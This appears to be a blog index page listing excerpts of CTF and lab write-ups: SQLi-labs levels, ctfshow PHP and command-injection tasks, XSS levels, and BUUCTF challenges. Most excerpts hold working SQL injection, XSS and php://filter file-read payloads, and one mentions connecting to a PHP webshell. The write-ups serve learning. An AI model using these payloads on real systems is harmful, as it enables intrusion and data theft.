CTF
文章平均质量分 53
_Stary
这个作者很懒,什么都没留下…
展开
-
# SQLILABS 34-61
SQLILABS 34-61level 34十六进制代替 " "里的东西1 �’union select 1,group_concat(schema_name) from information_schema.schemata #1 �’union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77 #level 35有点直接。。。数字型注入???原创 2021-07-23 22:18:12 · 170 阅读 · 0 评论 -
SQLLABS 20-33
SQLLABS 20-33第二十一关记得base64编码admin’) or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#admin’) or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.原创 2021-07-22 21:13:20 · 136 阅读 · 0 评论 -
SQLILABS穿关记录
SQLILABS穿关记录注:本文脚本需要根据自身情况修改第一关?id=1’ or 1=1 %23 //字符型注入?id=1’ or 1=1 union select 1,2,3,4%23 //报错字段为3?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //爆全部库库名 challenges,ctftraining,information_schema,mysql,pe原创 2021-07-21 21:00:00 · 140 阅读 · 0 评论 -
php特性
php特性正则解释器:https://regexper.com/在线转码:https://www.matools.com/hexweb89<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(原创 2021-07-20 21:24:28 · 269 阅读 · 2 评论 -
命令注入ctfshow
title: CTFshow命令注入date: 2021-07-15tags: [ctf]description: 刷题记录搜索引擎http://helosec.com/正则解释https://regexper.com/web31<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/.原创 2021-07-20 21:21:36 · 426 阅读 · 0 评论 -
# php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =原创 2021-07-19 22:20:26 · 76 阅读 · 0 评论 -
# SQL
SQLload_file()函数读取一个文件并将其内容作为字符串返回 其中file_name是文件的完整路径。堆叠注入1';show databases;#1';show tables;#1';show columns from FlagHere;#1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#一个知识点:HANDLER … OPEN语句打开一个表,使其可以使用后续原创 2021-07-17 21:16:03 · 87 阅读 · 0 评论 -
# php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =原创 2021-07-17 21:15:31 · 88 阅读 · 0 评论 -
# XSS闯关
XSS闯关思路:闭合事件闭合标签xss语句οnclick=alert(1)<a href=javascript:alert(‘xss’)>level 1直接输入level 2输入查看源码发现被转义 无法注入<>在源码这边搞事情,前后闭合"><script>alert('xss')</script>level 3'οnclick='alert(“xss”)'()未转义转义”<>level 4"οnclick原创 2021-07-17 21:13:36 · 133 阅读 · 1 评论 -
写题记录
写题记录先看代码<?php error_reporting(0);if(!sizeof($_GET))highlight_file(__FILE__);?><?=(ob_end_flush()?"":""),(ob_start()?"":"")?><?=array_pop($_GET);?><?=(ob_start(ob_get_clean())?array_pop($_GET):""),"",(ob_end_flush()?"":"")?>原创 2021-06-11 00:06:13 · 111 阅读 · 0 评论 -
[极客大挑战 2019]Knife
[极客大挑战 2019]Knife打开网页一句话木马,尝试连接抱歉,没有菜刀,但是有蚁剑连接成功翻目录找到flag刀呢??原创 2021-06-07 12:36:25 · 48 阅读 · 0 评论 -
[极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File查看源码点secret继续查看源码没发现什么东西回退抓个包看看有一个secr3t.php去打开有个flag.php打开很调皮,退回去看代码,猜测有文件包含漏洞过滤了…/ tp input date用伪协议payload ?file=php://filter/read=convert.base64-encode/resource=flag.php用base64解码得到flag...原创 2021-06-07 00:26:39 · 72 阅读 · 1 评论 -
[极客大挑战 2019]Havefun
[极客大挑战 2019]Havefun查看源码有一段php代码传参?cat=dog成功撸猫原创 2021-06-07 00:13:56 · 65 阅读 · 0 评论 -
[极客大挑战 2019]EasySQL
[极客大挑战 2019]EasySQL点开链接简单的sql注入尝试万能密码 1’ or 1 = 1 #得到flag这是我做过最简单的题了原创 2021-06-05 18:24:21 · 62 阅读 · 0 评论 -
[HCTF 2018]WarmUp
[HCTF 2018]WarmUp一些函数empty() 函数用于检查一个变量是否为空。bool empty ( mixed $var )当 var 存在,并且是一个非空非零的值时返回 FALSE 否则返回 TRUE。以下的变量会被认为是空的:"" (空字符串)0 (作为整数的0)0.0 (作为浮点数的0)"0" (作为字符串的0)NULLFALSEarray() (一个空数组)$var; (一个声明了,但是没有值的变量)is_string函数is_string ( mix原创 2021-06-05 18:02:46 · 291 阅读 · 1 评论